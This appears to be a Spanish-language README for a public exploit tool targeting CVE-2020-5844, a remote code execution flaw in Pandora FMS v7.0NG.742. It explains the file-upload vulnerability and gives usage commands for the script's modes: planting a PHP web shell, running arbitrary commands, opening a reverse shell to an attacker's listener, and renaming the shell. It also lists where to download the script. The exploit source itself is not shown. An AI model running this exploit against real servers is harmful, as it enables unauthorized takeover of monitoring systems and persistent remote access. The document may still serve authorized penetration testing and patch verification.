
Exploit para CVE-2020-5844 (Pandora FMS v7.0NG.742) - Ejecución remota de código

¿Te gusta este repo? ¡Danos una ⭐!
Solo para fines educativos y de investigación de seguridad autorizada.
@UNICORDev por (@NicPWNs y @Dev-Yeoj)
index.php?sec=godmode/extensions&sec2=extensions/files_repo en Pandora FMS v7.0 NG permite a administradores autenticados subir scripts PHP maliciosos y ejecutarlos mediante la decodificación base64 de la ubicación del archivo. Esto afecta a v7.0NG.742_FIX_PERL2020.
Utilice este exploit para ejecución remota de código en versiones vulnerables de Pandora FMS. Requiere una dirección IP y un puerto de destino. Requiere un nombre de usuario/contraseña válidos o una autenticación válida de cookie PHPSESSID. Ejecútelo en modo predeterminado para subir un web shell PHP básico. Ejecútelo en modo de comando personalizado para ejecutar un comando personalizado en el destino. Ejecútelo en modo reverse shell para recibir una reverse shell del destino en un listener que usted configure. Ejecútelo en modo de web shell personalizado para cambiar el nombre del archivo del web shell PHP.
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]
python3 exploit-CVE-2020-5844.py -h
-t Target host and port. Provide target IP address and port.
-u Target username and password. Provide username and password to log in to Pandora FMS.
-p Target valid PHP session ID. No username or password needed. (Optional)
-s Reverse shell mode. Provide local IP address and port. (Optional)
-c Custom command mode. Provide command to execute. (Optional)
-w Web shell custom mode. Provide custom PHP file name. (Optional)
-h Show this help menu.
Descargar exploit-CVE-2020-5844.py desde GitHub
Descargar exploit-CVE-2020-5844.py desde ExploitDB
searchsploit -u
searchsploit -m 50961
Pandora FMS v7.0NG.742




